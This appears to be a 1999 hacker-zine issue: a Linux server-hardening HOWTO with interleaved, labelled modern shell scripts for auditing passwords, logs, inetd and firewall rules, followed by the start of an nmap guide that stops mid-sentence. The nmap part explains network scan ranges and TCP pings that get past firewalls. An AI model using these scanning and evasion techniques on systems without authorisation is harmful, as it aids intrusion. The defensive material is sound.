        This paper is not a super-detailed paper; for that purpose there are other
        papers mentioned at the end of this HOWTO. This paper was intended to give a
        small clue of what people should check before they decide to allow services to
        run on their systems, or fully connect to the Internet.
        
        More and more people every day connect their systems to the Internet, and more
        people are seriously thinking of buying either a leased line or a cable modem
        and staying on-line 24-7.
        There are a lot of systems on-line; some of them are tightly secured, and
        others are wide open, yelling to be hacked.
        This text is intended to give a small idea of what someone should check on
        his system before he goes on-line, or what to secure once he is on-line.
       
       SERVICES
       
        Many servers over the Internet offer a wide range of services to their users and
        customers; what comes with this is a big risk, since time has proved that a lot
        of services are usually buggy and easily exploitable, providing root access or
        other kinds of access to remote or local users.
        An administrator of either a home system or a company should be
        able to keep track of these bugs and try to keep his software as up to
        date as he can. This can be done by subscribing to several security mailing
        lists, such as Bugtraq or CERT (links included at the end of this document).
        Another major issue with services is the configuration of each service.
        Services usually follow a "guideline" of operation, which is usually declared
        in the configuration section of each service. The most buggy services have
        proved to be: sendmail, web servers, ftp servers, and generally all
        services that have to do with interaction between the user and the file
        system. People often like to bypass the configuration of services, and like
        to leave them the way they were installed, without even taking a look at what
        the configuration offers; this is a major mistake often found with junior
        administrators, or newcomers to the Unix world. 
       
       WEB SERVERS
       
        Web servers keep their configuration files under the directory /etc/httpd/conf
        (default installation from the Linux distribution, which we encourage you to
        update to the most recent), or under /usr/local/apache/conf if recompiled and you
        leave the paths intact.
        Take a good look at the configuration; sometimes you will see it has entries
        you wouldn't want. The one you should surely check is under what user
        httpd operates: make sure httpd runs under user:nobody and group:nobody. Check
        that the log directory is not user writable; you don't want users "playing" with
        your log files now, do you?
        The biggest security threat lately with httpd, though, is its CGIs.
        CGIs are small programs written either in perl or C which are used by the
        webserver, and are usually the most dangerous.
        CGIs coming from some unknown or not-that-reliable source should be
        checked for possible problems in their code which would risk the security of
        your webserver. The security risks a CGI could possibly create are the
        following:
        1) Expose information about your webserver and its local filesystem/users.
        2) Search scripts are the most dangerous, since a small misconfiguration
        would allow remote users to search your entire filesystem and reveal high
        risk information to them. Even if you don't run your webserver as root, you
        still have chances to run into big trouble.
        Try not to give users access (if you allow user webpages, or have
        virtualhosts) to their cgi-bin directories; instead let them mail you and ask
        you to check a cgi script they want to use, or even better give them a list of
        CGIs they can use, that you trust.
        Avoid suid privileged scripts; they are high risk and there is rarely the
        need for a script to be under such privileges.
        Try to have scripts that validate the content submitted by forms; validation
        of data is a more secure way to control what is being passed to your system.
        Avoid scripts that will allow remote systems to use them (Matt's scripts allow
        this feature).
        And finally avoid all scripts that have to do with web interfaces on
        services...these scripts usually are of super high risk!
        More on web security can be found by following the links below.
       
       FTP
       
        FTP servers are another high risk on systems; generally it would be wise to
        avoid the use of FTP if there is no need, or if there is a need you should
        avoid having anonymous ftp enabled.
        FTP servers are used for file transfers between hosts. More often they are
        used to give users of systems access to their websites.
        If you are one of the persons that love, or like, to contribute to the Linux
        community, either by having a public ftp server offering mirroring services
        or by using the ftp server to release your software, you should be very careful
        of what you give, and what you allow remote users to have.
        The default ftp daemon that comes with the Linux installation is wu-ftpd; this
        server is simple and good, but unfortunately several bugs were discovered,
        and it seems updates to it are not that frequent. So I recommend the use of a
        more advanced FTP server, which will allow you to have more detailed
        configuration files. One ftp server I like a lot and use often is ProFTPd;
        this server has an apache-like configuration file, and allows the admin to
        have full control over it.
        It's widely used on major sites such as Linuxberg and Freshmeat, it updates
        frequently and they have a very good response time on bugs found in it.
        Its site offers very good documentation, and the configuration of it is
        really easy, even for the average users who want to give partial access to
        remote users.
        It can run as a standalone daemon, or through inetd with the use also of
        tcp-wrappers.
        For instance, let's have a look at how ProFTPd is configured to allow remote users
        to upload to a directory, but deny them downloading from that dir (good to
        deny warez usage of your ftp server) and also deny them the creation of
        subdirectories.
       <Anonymous /home/ftp>
       
                     User ftp
                     Group ftp
                     UserAlias anonymous ftp
       
                     <Directory *>
       
                            <Limit WRITE>
                            DenyAll
                            </Limit>
       
                     </Directory>
       
                     <Directory incoming>
       
                            <Limit STOR>
                            AllowAll
                            </Limit>
                            <Limit READ>
                            DenyAll
                            </Limit>
       
                     </Directory>
       
               </Anonymous>
        This is what the entry looks like in proftpd.conf. This denies the remote
        anonymous users writing to any directory except incoming; in that
        directory anonymous users are allowed to upload files, but they are denied
        reading the directory, deletion of files, or the creation of
        subdirectories. If you are more paranoid, and even if you have limited the usage
        of ftp only to valid users but you need more security, you can make use of a
        nice firewall; this though requires that most of your ftp users are local
        users, and that remote users who are allowed usage of the ftp server have static
        IPs. To do so, you would set up a firewall allowing access from your subnet
        and the remote users, and DENY everyone else trying to connect to it.
       
       SHADOW PASSWORDS
       
        One of the most important things is password management. Passwords are
        held in the /etc/passwd file (in case you didn't know...). Leaving password
        files like that is a high security risk, and even if you don't allow access to
        the system to any user, it should be more secure.
        Password files can be made more secure with the usage of shadow. Since password
        files are user readable you should switch to shadow (I don't understand why
        some distributions of Linux don't install shadowing by default); anyway, as we
        said, /etc/passwd is world readable, which means that any user with access to
        your system is able to read the password file. The encryption of password
        files is really weak, and a simple user with a password cracker would be able
        to crack a few passwords in a few minutes. It's highly advisable to all users,
        either with local boxes or company administrators, to switch to shadowing.
        To use shadowing on your system you only have to run the pwconv command,
        usually residing in the /usr/sbin directory. This will create a separate file
        in the /etc dir called shadow, which holds the encrypted passwords, and will
        replace the password field in the /etc/passwd file with an "x", e.g.
       
       pestilence:x:500:500::/home/pestilence:/bin/bash
       
        This is the entry in passwd after the usage of shadow.
        The original password is kept in /etc/shadow, which is readable only by root,
        thus now denying the local users a chance to "take a look" at your passwords.
        For more security, if you use a radius server together with a cisco
        router for authentication, it would be wise to deny access to users at your
        system; to do this simply change the shell entries in the passwd file to some
        non-existent shell.
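        An added example (not part of the HOWTO) that audits a passwd file for the two
        points above: password fields that pwconv has not yet replaced with "x", and
        accounts that still point at a valid login shell; the passwd and shells
        contents it uses are constructed sample data, not from a real system.

```shell
#!/bin/sh
# Added example (not part of the HOWTO): audit a passwd file for hashes that
# never moved to /etc/shadow and for accounts that can still log in.
# The passwd and shells data below are constructed for this example.

# unshadowed_accounts PASSWD: usernames whose password field is anything
# other than the pwconv placeholder "x" or the lock markers "*" and "!".
# This catches both a hash left in the world-readable file and an empty
# (passwordless) field.
unshadowed_accounts() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" { print $1 }' "$1"
}

# login_shell_accounts PASSWD SHELLS: usernames whose shell (field 7) is
# listed in SHELLS (normally /etc/shells); comment lines in SHELLS are
# ignored. For the radius/cisco setup above, this list should be empty
# for every account that is not supposed to get a shell.
login_shell_accounts() {
    awk -F: 'NR == FNR { if ($0 !~ /^#/) valid[$0] = 1; next }
             ($7 in valid) { print $1 }' "$2" "$1"
}

# write_sample_passwd FILE: constructed passwd, only partly converted by
# pwconv (oldguy still has a hash, svc has no password at all).
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
pestilence:x:500:500::/home/pestilence:/bin/bash
oldguy:Ab1Cd2Ef3Gh4I:501:501::/home/oldguy:/bin/bash
radius1:x:502:502::/home/radius1:/bin/false
svc::503:503::/var/svc:/sbin/nologin
EOF
}

# Stand-alone run against the constructed sample (point the functions at
# /etc/passwd and /etc/shells to audit a real system).
d=$(mktemp -d)
write_sample_passwd "$d/passwd"
printf '# valid shells\n/bin/sh\n/bin/bash\n' > "$d/shells"
echo "accounts still carrying a hash (or no password) in passwd:"
unshadowed_accounts "$d/passwd"
echo "accounts with a valid login shell:"
login_shell_accounts "$d/passwd" "$d/shells"
rm -rf "$d"
```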
       
       POP
       
        POP is used to allow users to retrieve their e-mail remotely. There aren't many
        pop daemons, but it's preferred not to use the default that comes with the
        installation (ipop3d); I would advise you to use one such as qpopper, which
        runs through inetd and can be used with TCP Wrappers.
        POP is a service that usually is wide open; this means that users that have
        accounts on your system but also use some other ISP can connect to your
        system and retrieve their mail.
        Usually it's left like that, but if you are really paranoid you can block all
        remote systems and allow only local users to connect and retrieve their mail.
        Just one thing must be sure: don't install a pop daemon that doesn't get the
        needed support from its authors, or doesn't produce some kind of detailed logs
        (such as failed password entry attempts, or connections).
       
       SENDMAIL
       
        Here things get a bit more complicated. Sendmail is the daemon used to send
        and receive e-mails between hosts.
        Sendmail uses several configuration files, with its main config file being
        sendmail.cf.
        Through this file you declare the files to be used for various purposes, such
        as the list of the domains allowed to use sendmail (ip-allow, name-allow),
        and the relay list, which contains the domains of virtualhosts you host.
        Let's take a closer look at sendmail.
        Unfortunately sendmail is probably one of the most buggy services on the
        Internet; up to now nearly all versions of it have had either a remote or local
        exploit.
        Because of these problems you should be really careful with sendmail; a small
        misconfiguration might cause you a big headache later.
        The main files you should be careful with are:
        ip-allow --> here you enter all the IPs you want to allow to use your
        sendmail...don't leave it blank, otherwise you will have the whole Internet
        using your sendmail to mail.
        name-allow --> same as above but here you enter the hostnames of the systems
        (usually used when VirtualHosting is being done on your systems).
        relay --> This file contains the hosts to which we allow relaying...this also
        shouldn't be left empty.
        sendmail.cw --> this file holds all the aliases for your system; this is again
        used if you host several virtual domains.
        Don't forget to upgrade your sendmail often...yes I know this is kinda like
        a small pain in the ass, but it's also your only way to prevent the damage
        that a newly discovered bug can produce.
       
       DNS
       
        DNS is the service used to resolve the ip address of a host to a valid
        hostname.
        All big networks with their own domain use DNS. DNS has been subject to heavy
        remote exploitation in the past, and also is a service that can be used to
        give away a lot of useful info to intruders (such as your network systems;
        intruders, combining this with the BIND version, can sometimes guess the remote
        O/S and its version). It's highly advisable to move to BIND 4.9.7 or the 8.X
        series; if you are still running a 4.9.6 series of it, then you are vulnerable
        to a remote root exploit.
        Make sure you have configured DNS properly, otherwise you might experience
        problems. Also the use of a firewall (for the interaction between the primary
        and the secondary nameserver) would be highly recommended.
       
       LOGGING
       
        One of the most important aspects of system administration is extensive
        logging, and also constant monitoring of the systems.
        Linux uses various loggers; all of the logs are kept under /var/log.
        Let's take a better look at the logs of Linux:
        messages --> here the system outputs various kernel and service messages with
        the use of sysklogd
        secure --> here the system logs connection attempts to various ports from
        local or remote hosts.
        maillog --> The sendmail daemon logs nearly everything here.
        xferlog --> the ftp daemon outputs its messages here.
        wtmp --> When a user logs in, or the system reboots, this file changes; it's a
        binary file and you can't "cat" it or "tail" it. To get access to it you use
        the "last" command. This command outputs the data kept in wtmp, formatted.
        Although system logs are kept under root privileges, that doesn't mean that
        once you're hacked they can't be modified; there are various tools in the trade
        which allow users to erase specific strings from them and thus hide their
        appearance on your systems. A way to make it more difficult to erase their
        presence from the logs (although this doesn't mean they can't still erase them)
        is to use remote logs; sysklogd has a feature which allows system admins to
        log also on remote systems. I would recommend this method, since it allows you
        to have a separate log file on a remote system, and since the hacking scene
        has a lot of newbies they nearly never check for remote logs.
        Although the logging facility of Unix systems is good, it's not designed for
        heavy logging. To have a better chance of detecting suspicious moves, I recommend
        log daemons for this specific task...detect and log. Such loggers are iplog
        (which I widely use on my systems). Iplog is a set of 3 log daemons:
        tcplog --> logs and detects all tcp connections; it's also able to detect and
        log scans using nmap.
        udplog --> logs all udp traffic
        icmplog --> logs all icmp traffic
        Always try to enable separate logs for all your daemons (e.g. qpopper -->
        /var/log/pop); this makes the monitoring process easier.
        Get logcheck; this program will scan your regular logs for security
        violations, unusual system events, etc.
        Try to monitor your system logs regularly...don't let them pass by; before the
        storm there are always some drops of rain...so you might be lucky and stop the
       intruders before they gain access. Make some shell script for your logs, and
       make them scan your logs for specified strings, enable their usage with the
       cron daemon, and make them check the logs in small period of time, so you can
       have a nice organized report in small time periods, without confusing your
       head in the (usually) huge system logs.
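        Here is the kind of cron-driven log report the paragraph above asks for,
        added here as an example; it is not part of the original article. The
        patterns and the ignore list are assumptions to tune for your own site, and
        the lines produced by sample_secure_log are constructed to look like
        /var/log/secure and /var/log/messages entries, not captured ones. For the
        remote logging part, the sysklogd side is a line such as `*.*  @loghost`
        in /etc/syslog.conf on the client, and syslogd started with -r on the loghost.

```shell
# Added example, not from the original article: a logcheck-style report
# to run from cron. LOG_PATTERNS and LOG_IGNORE are assumptions to tune
# per site; the lines in sample_secure_log are constructed, not real.

# Strings worth a second look in /var/log/secure and /var/log/messages.
LOG_PATTERNS='refused connect|authentication failure|FAILED su|entered promiscuous mode|Packet log:'

# Known noise to drop before reporting (assumption: our own cron host).
LOG_IGNORE='cron\.foo\.com'

# scan_log: read log lines on stdin, print the suspicious ones that are
# not covered by the ignore list.
scan_log() {
    grep -E "$LOG_PATTERNS" | grep -Ev "$LOG_IGNORE" || true
}

# count_suspicious: how many lines scan_log would report for stdin.
count_suspicious() {
    scan_log | grep -c . || true
}

# sample_secure_log: constructed sample data in syslog format.
sample_secure_log() {
    cat <<'EOF'
Apr  1 02:11:05 pestilence in.telnetd[402]: refused connect from 10.9.8.7
Apr  1 02:11:09 pestilence login[410]: authentication failure; (uid=0) -> root for login service
Apr  1 02:12:00 pestilence CROND[415]: (root) CMD (run-parts /etc/cron.hourly)
Apr  1 02:13:31 pestilence kernel: device eth0 entered promiscuous mode
Apr  1 02:14:02 pestilence in.ftpd[420]: refused connect from cron.foo.com
Apr  1 02:15:44 pestilence su: FAILED su for root by bob
EOF
}

# report_logs FILE...: one section per log file; this is what cron runs,
# e.g.  */15 * * * * root /usr/local/sbin/logreport.sh | mail -s "log report" root
report_logs() {
    for f in "$@"; do
        [ -r "$f" ] || continue
        echo "=== $f ==="
        scan_log < "$f"
    done
}
```

        The ignore list is what keeps the report short enough that you actually
        read it; add to it only after you have looked at each new kind of noise
        once, otherwise it becomes the place where real alerts disappear.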
       
        XWINDOWS
        
        Xwindows is another security headache.
        Unfortunately Xwindows carries a lot of risk, so if you use a system as a
        server i would advise not to run Xwindows on it, as you put your security
        at risk by using it.
        If you do need it, make sure to set up some security: use a firewall on the
        X ports (6000 and up), and don't forget the "xhost -" command, which
        disables remote access to your X server for every host not explicitly listed.
       
        TELNET
        
        If there isn't a real necessity for it, disable it. Although telnet by itself
        isn't that much of a security risk, it can help future intruders work their
        way in more easily (everything, passwords included, travels in clear text).
        If you need telnet, set up a firewall to restrict access to it.
        A simple move against the total newbies is to change your /etc/issue.net
        file: issue.net usually contains the type of O/S you run, and it's used as a
        banner for telnet connections. Although there are tools in the trade to
        detect what a remote system's O/S is (nmap, queso), there are also plenty of
        windows hacker wannabes who will just telnet in to check what O/S you're
        running. Deny them (even if it's really easy to determine the remote O/S)
        knowledge of your system.
       
        KERNEL OPTIONS
        
        On the 2.2.x series of kernels there are a few interesting boolean options
        under your /proc/sys/net/ipv4 directory; these are icmp_echo_ignore_all,
        icmp_echo_ignore_broadcasts, etc. These files are used to specify some
        networking "reactions" of your system. It is advised (not necessary though)
        to do:
        echo 1 > 
        to those files. This prevents replies to ping requests (ignore_all), and
        silences replies to broadcast pings, which is what lets your network be used
        as a smurf amplifier (ignore_broadcasts). Note that ignoring all echo
        requests also breaks legitimate pings to your host; the broadcast setting
        alone is enough against smurf.
        tcp_syncookies is also advised to be echoed to 1, if your system is a widely
        used server (this needs a kernel compiled with syncookie support).
        While compiling the 2.2.x kernel don't forget to include as many networking
        options as you can, such as routing messages, firewall support, etc.
        This will help you set up a more effectively working network.
       
        SNIFFERS
        
        Although sniffers aren't necessary to run all the time, it's wise to use
        them from time to time.
        Network sniffers capture and display the datagrams moving around your
        network; they're usually a helpful way to detect problems in your network.
        The latest kernels also log it when a device enters promiscuous mode (a
        sniffer was activated on that device); watch /var/log/messages for such
        lines. Make sure ordinary users don't have access to the sniffer, otherwise
        you will have big time trouble (since most services still use plain text
        passwords).
        There is a big collection of good sniffers, so i won't discuss any of them; i
        usually fire up X and run Ethereal if there is a big need to do so.
       
        AUDITING TOOLS
        
        These tools are widely used by hackers to scan networks for known problems,
        so if hackers use them, you should also use them.
        Nessus is at the moment the best tool for such a task; it is updated nearly
        every day and currently supports 209 security checks.
        Always run a scan on your network and check if you missed something; don't
        allow intruders to take advantage of something you forgot.
        These tools should be used very often on ALL your systems.
       
        TEMPORARY SYSTEMS
        
        A lot of times before i install a server, i temporarily connect it to the
        network so i can ftp and fetch all the needed files.
        Since these systems are getting ready to either replace an existing server,
        or to be a part of the network as a new server, you should be very careful.
        Intruders don't always scan a single system; they might scan a whole subnet
        to get information on every system you have running on your network. So even
        if that system is a temporary one, don't skip its configuration: configure it
        to be as secure as it can be, and try to deny every kind of connection to it
        (use a firewall or something).
       
        ## /etc/inetd.conf ##
        
        Through this file some of the system's services are handled. The default
        file has many useless and unwanted services open. You should modify this
        file immediately after you install your system.
        Close nearly all ports and leave open only those you need: echo, discard,
        daytime, time, chargen and such ports are rarely used and are not needed by
        any programs, so make sure you disable them (comment the line out and send
        inetd a HUP signal so it rereads the file).
        Services in inetd.conf have the ability to work with tcp_wrappers. We are
        going to explain tcp_wrappers in the next section.
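        As an added example (not the article's own script), here is the inetd.conf
        cleanup done as a repeatable function rather than by hand in vi: it comments
        out the listed services, reports how many lines it changed, and can be run
        again without doing damage. The service list is an assumption (the "small"
        services plus finger), and the inetd.conf written by write_sample_inetd_conf
        is a constructed sample, not a real system file.

```shell
# Added example, not from the original article: comment out unneeded
# inetd services in inetd.conf and report what changed. The service
# list is an assumption; the sample inetd.conf below is constructed.

# Services that nothing needs and that intruders probe anyway.
INETD_DISABLE="echo discard daytime chargen time finger"

# disable_inetd_services FILE: comment out every active line whose
# service name (first field) is in INETD_DISABLE. Prints the number
# of lines changed; running it twice changes nothing the second time.
disable_inetd_services() {
    file=$1
    changed=0
    for svc in $INETD_DISABLE; do
        # Match the name at the start of an uncommented line followed
        # by whitespace, so "time" does not match "timed".
        n=$(grep -c "^$svc[[:space:]]" "$file" || true)
        if [ "$n" -gt 0 ]; then
            sed "s/^\($svc[[:space:]]\)/#\1/" "$file" > "$file.tmp" && mv "$file.tmp" "$file"
            changed=$((changed + n))
        fi
    done
    echo "$changed"
}

# active_inetd_services FILE: the service names still enabled.
active_inetd_services() {
    grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$' | awk '{print $1}'
}

# write_sample_inetd_conf FILE: constructed sample in inetd.conf format.
write_sample_inetd_conf() {
    cat > "$1" <<'EOF'
# constructed sample, not a real system file
echo    stream  tcp     nowait  root    internal
echo    dgram   udp     wait    root    internal
daytime stream  tcp     nowait  root    internal
time    stream  tcp     nowait  root    internal
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
pop-3   stream  tcp     nowait  root    /usr/sbin/tcpd  ipop3d
EOF
}

# After editing the real /etc/inetd.conf, make inetd reread it:
#   kill -HUP `cat /var/run/inetd.pid`
```

        Run active_inetd_services on the real file afterwards and look at every
        line it prints; anything you can't name a reason for is a candidate for the
        list.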
       
        TCP WRAPPERS
        
        Tcp wrappers are files that are used to restrict access to your system
        (although i prefer using a firewall for this kind of work). If you are new to
        the firewall world and need to restrict access to some services really
        quickly, use them, but then go and read the firewall HOWTO :).
        The best way would be to use both a firewall and tcp wrappers.
        Tcp wrappers use the files /etc/hosts.allow and /etc/hosts.deny: hosts.allow
        holds the ip addresses of the systems or subnets you want to allow access to
        services, and hosts.deny lists the hosts that are denied access to services.
        hosts.allow is consulted first, then hosts.deny, and a connection that
        matches neither file is allowed, so hosts.deny must end with a catch-all
        entry or your lists protect nothing. tcpdchk and tcpdmatch (shipped with tcp
        wrappers) check your files and tell you what a given connection would get.
        WARNING: Not all services use tcp wrappers; for instance sendmail is now a
        stand-alone daemon, so tcp wrappers won't work with it (unless it was built
        with libwrap support). Make sure you check that a service supports tcp
        wrappers before feeling "kinda" secure.
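        To make the allow/deny order concrete, here is a small emulation of tcpd's
        decision, added as an example; it is neither the article's code nor the real
        tcpd (use tcpdmatch for that). It handles ALL, exact names, trailing-dot
        network prefixes like 194.1.2. and leading-dot domain suffixes like
        .foo.com; the EXCEPT operator, netmasks and the optional shell-command field
        are left out. The hosts.allow and hosts.deny contents written by
        write_sample_wrappers are constructed, as are the addresses in them.

```shell
# Added example, not part of the article and not the real tcpd: an
# emulation of the tcp_wrappers decision order so the rules can be
# tried offline. Supports ALL, exact matches, "10.1." network prefixes
# and ".foo.com" domain suffixes; EXCEPT, netmasks and shell commands
# are not handled. The sample files below are constructed.

# wrap_match PATTERN VALUE: one token of a daemon or client list.
wrap_match() {
    pat=$1; val=$2
    case "$pat" in
        ALL) return 0 ;;
        *.)  case "$val" in "$pat"*) return 0 ;; esac ;;   # 194.1.2. prefix
        .*)  case "$val" in *"$pat") return 0 ;; esac ;;   # .foo.com suffix
        *)   [ "$pat" = "$val" ] && return 0 ;;
    esac
    return 1
}

# wrap_list_match LIST VALUE: LIST is comma- or space-separated.
wrap_list_match() {
    for tok in $(echo "$1" | tr ',' ' '); do
        wrap_match "$tok" "$2" && return 0
    done
    return 1
}

# wrap_file_match FILE DAEMON CLIENT: does any entry in FILE match?
# A missing file matches nothing, exactly like tcpd.
wrap_file_match() {
    [ -r "$1" ] || return 1
    grep -v '^[[:space:]]*#' "$1" | grep ':' | while IFS=: read -r dlist clist rest; do
        if wrap_list_match "$dlist" "$2" && wrap_list_match "$clist" "$3"; then
            echo match
        fi
    done | grep -q match
}

# wrap_decide DAEMON CLIENT ALLOWFILE DENYFILE: prints ALLOW or DENY in
# tcpd's order: hosts.allow first, then hosts.deny, otherwise allowed.
wrap_decide() {
    if wrap_file_match "$3" "$1" "$2"; then echo ALLOW
    elif wrap_file_match "$4" "$1" "$2"; then echo DENY
    else echo ALLOW
    fi
}

# write_sample_wrappers DIR: constructed hosts.allow and hosts.deny.
write_sample_wrappers() {
    cat > "$1/hosts.allow" <<'EOF'
# constructed sample: only our own hosts may use telnet and ftp
in.telnetd, in.ftpd : 194.1.2. , .foo.com
EOF
    cat > "$1/hosts.deny" <<'EOF'
# constructed sample: everything not explicitly allowed is refused
ALL : ALL
EOF
}
```

        The last branch of wrap_decide is the one that bites people: with an empty
        or missing hosts.deny every daemon you forgot to list is reachable from
        anywhere, which is why the sample hosts.deny ends in ALL : ALL.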
       
        FIREWALLS
        
        Firewalls are something that every administrator loves to have on his
        network; firewalling can have many different faces:
        1) Connecting an internal network through a single system (also called
        masquerading; that system can also act as a firewall, denying remote users
        any way into the internal network).
        2) A system which, through a program such as ipfwadm (for the 2.0.x kernels)
        or ipchains (for the 2.2.x kernels), can block and filter connections to
        user-specified ports.
        A firewall acts as a wall between your system and the Internet: you configure
        it the way you like, and it acts that way.
        For instance on my system (kernel 2.2.4), when i want to block users
        connecting to my telnet port, i issue the following command:
        ipchains -A input -p tcp -s 0/0 -d 194.xxx.xx.xx telnet -j DENY -l
        Let's take a closer look at this command:
        -A input --> ipchains comes with 3 built-in chains (input/output/forward,
        meaning incoming data, outgoing data, and forwarded data); with the -A flag
        we tell ipchains to Append our "rule" to the chain.
        -p tcp --> here we specify the protocol; other protocols include udp and
        icmp.
        -s 0/0 --> -s stands for source IP/host/subnet; you can specify either a
        whole subnet or a single IP, and 0/0 stands for everyone, so we tell ipchains
        to match any source address with this rule.
        -d 194.xxx.xx.xx --> -d stands for destination IP/host/network; here we
        specified a single IP (xxx used for privacy reasons, change them to your IP
        address). This is the IP of the destination host, meaning the host that
        receives the data; usually you would specify your own system, unless you
        have a router-box.
        telnet --> after the destination host you specify the port or service;
        ipchains understands service names which exist in the /etc/services file,
        otherwise you need to specify a port or a range of ports. For instance if we
        wanted to block ports 6000 up to 6010 we would type:
        6000:6010 
        -j DENY --> here we tell ipchains what to do with datagrams that match this
        rule; here we simply DENY them (drop them silently). Other targets include
        ACCEPT and REJECT (drop, but send an ICMP error back to the sender).
        -l --> -l stands for logging; with this option ipchains will output through
        the kernel, into /var/log/messages, every packet that matches this rule. Be
        aware that this usually produces some heavy logs.
        Remember to think wisely when you create a rule: the service may be needed,
        or some other hosts must have access to it, and by blocking a needed service
        you might create some problems.
        Always remember that when you want to block a service but give access to
        certain systems/networks, you have to declare the ACCEPT rules first and then
        the DENY, otherwise all hosts will be denied, since ipchains checks a datagram
        against the rules of a chain in order, from top to bottom, and the first
        matching rule decides.
        For example say we own pestilence.foo.com and we want to grant access to the
        ftp service to cool.foo.com, but DENY everyone else. We would type the
        following:
        ipchains -A input -p tcp -s cool.foo.com -d pestilence.foo.com ftp -j ACCEPT
        ipchains -A input -p tcp -s 0/0 -d pestilence.foo.com ftp -j DENY -l
        
        Now cool.foo.com has access to our ftp, but the rest of the Internet doesn't.
        For more information on firewalling take a look at the HOWTO.
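        Because the rule order is what decides, it pays to keep the rules in a
        script that rebuilds the chain from scratch and to check the order before
        loading it. The script below is an added example, not the article's own: it
        wraps the two ftp rules from the text (the host names and the 194.x address
        are the article's placeholders), flushes the input chain first, and has a
        dry-run checker that reads the commands back and complains if an ACCEPT for
        a port sits behind the DENY for the same port. Set IPCHAINS=echo to print
        the commands instead of loading them.

```shell
# Added example, not the article's own script: the ftp rules from the
# text inside a rebuildable firewall script, plus a dry-run check of the
# rule order. Set IPCHAINS=echo to print instead of load. Host names and
# addresses are the article's placeholders (assumptions).
IPCHAINS=${IPCHAINS:-ipchains}
MYHOST=${MYHOST:-pestilence.foo.com}
FRIEND=${FRIEND:-cool.foo.com}

# fw_rules: load the input chain in the order it must be checked.
fw_rules() {
    # Flush first: rerunning an append-only script would put the new
    # ACCEPTs behind the old DENY, where they never match.
    $IPCHAINS -F input
    # Specific ACCEPTs come first; the first matching rule decides.
    $IPCHAINS -A input -p tcp -s "$FRIEND" -d "$MYHOST" ftp -j ACCEPT
    # Then the catch-all DENY for the service, logged with -l.
    $IPCHAINS -A input -p tcp -s 0/0 -d "$MYHOST" ftp -j DENY -l
    # Services nobody outside should reach at all.
    $IPCHAINS -A input -p tcp -s 0/0 -d "$MYHOST" telnet -j DENY -l
    $IPCHAINS -A input -p tcp -s 0/0 -d "$MYHOST" 6000:6010 -j DENY -l
}

# fw_rules_wrong: the ordering mistake the text warns about, kept only
# so the checker below has something to catch.
fw_rules_wrong() {
    $IPCHAINS -F input
    $IPCHAINS -A input -p tcp -s 0/0 -d "$MYHOST" ftp -j DENY -l
    $IPCHAINS -A input -p tcp -s "$FRIEND" -d "$MYHOST" ftp -j ACCEPT
}

# fw_check_order RULEFUNC: dry-run RULEFUNC and print "ok" if every
# ACCEPT for a port precedes the DENY for that port, else "BAD".
fw_check_order() {
    IPCHAINS=echo "$1" | awk '
        /-j DENY/   { for (i = 1; i <= NF; i++) if ($i == "-d") port = $(i + 2); denied[port] = NR }
        /-j ACCEPT/ { for (i = 1; i <= NF; i++) if ($i == "-d") port = $(i + 2); if (port in denied) bad = 1 }
        END { print (bad ? "BAD" : "ok") }'
}
```

        Usage: put the functions in /etc/rc.d/rc.firewall, call fw_rules at the end
        of it, and run fw_check_order fw_rules after every edit; the checker is
        deliberately simple (it keys on the port argument after -d only), which is
        enough to catch the ordering error but not every way to shoot yourself.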
       
        Comments, suggestions:
        pestilence@netplan.gr
        
        flames > /dev/null /* keep them to yourself :p */
        
        Further References
        Here are links that every admin should visit...
        
        http://www.genocide2600.com/~tattooman  /* The biggest security archive on
        planet earth...just name it...tattoo has it...*/
        http://howto.linuxberg.com /* All the known Linux HOWTOs */
        http://www.geek-girl.com/bugtraq/index.html /* All BUGTRAQ postings are there*/
        http://www.technotronic.com /* Another security related site, worth a look */
        http://www.rewted.org /* Same as above */
        http://www.freshmeat.net /* Nearly every known Linux app indexed */
        http://www.linuxberg.com /* The Linux tucows site */
        
        /* and finally some news produced in a way you never saw: (that's for the
        fun...)*/ 
        http://www.innerpulse.com 
       





       
       @HWA     
       
  35.0 Guide to using NMAP by Lamont Granquist .
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       From Packetstorm http://www.genocide2600.com/~tattooman/new.shtml 
       
       Date: Mon, 5 Apr 1999 16:50:23 -0700
       From: Lamont Granquist <lamontg@raven.genome.washington.edu>
       To: nmap-hackers@insecure.org
       Subject: NMAP guide
       
       
       NMAP has been getting a lot of review on what its capabilities are lately,
       so I thought I'd take a shot at it as well.  I skipped over a few things
       that I didn't think were really worth mentioning (you better be able to
       figure out -p and -F).
       
       Comments more than welcome.
       
       -------------------------------------------------------------
       
       NMAP does three things.  First, it will ping a number of hosts to
       determine if they are alive or not.  Second, it will portscan hosts to
       determine what services are listening.  Third, it will attempt to
       determine the OS of hosts.
       
       Of course NMAP is very configurable, and any of these steps may be
       omitted, (although portscanning is necessary in order to do an OS scan),
       and there are multiple ways to accomplish most of these, and many command
       line switches to tweak the way that NMAP operates.
       
       Target Selection
       
       You can specify NMAP targets both on the command line or give a list of
       targets in a filename with the -i option.  As the NMAP help documentation
       suggests you can use the hostname/mask method of specifying a range of
        hosts (cert.org/24 or 192.88.209.5/24) or you can give an explicit IP range
       (192.88.209.0-255).  The '24' in 'cert.org/24' is the number of bits in
       the mask, so /32 means "just that host", /24 means "the 256 addresses in
       that Class C", /16 means "the 65536 addresses in that Class B", /8 would
       be "the 2^24 addresses in that Class A" and /0 would scan all possible
       (IPv4) 2^32 IP addresses.
       
       Ping Scans
       
       The default behavior of NMAP is to do both an ICMP ping sweep (the usual
       kind of ping) and a TCP port 80 ACK ping sweep.  If an admin is logging
       these this will be fairly characteristic of NMAP.  This behavior can be
       changed in several ways.  The easiest way is, of course, to simply turn
       off ping sweeps with -P0.
       
       If you want to do a standard ICMP ping sweep use -PI.  If you are trying
       to get through a firewall, though, ICMP pings will likely be blocked and
       using packet filtering ICMP pings can even be dropped at the host.  To get
       around this NMAP tries to do a TCP "ping" to see if a host is up.  By
       default it sends an ACK to port 80 and expects to see a RST from that port
       if the host is up.  To do only this scan and not the ICMP ping scan use
       -PT.  To specify a different port than port 80 to scan for specify it
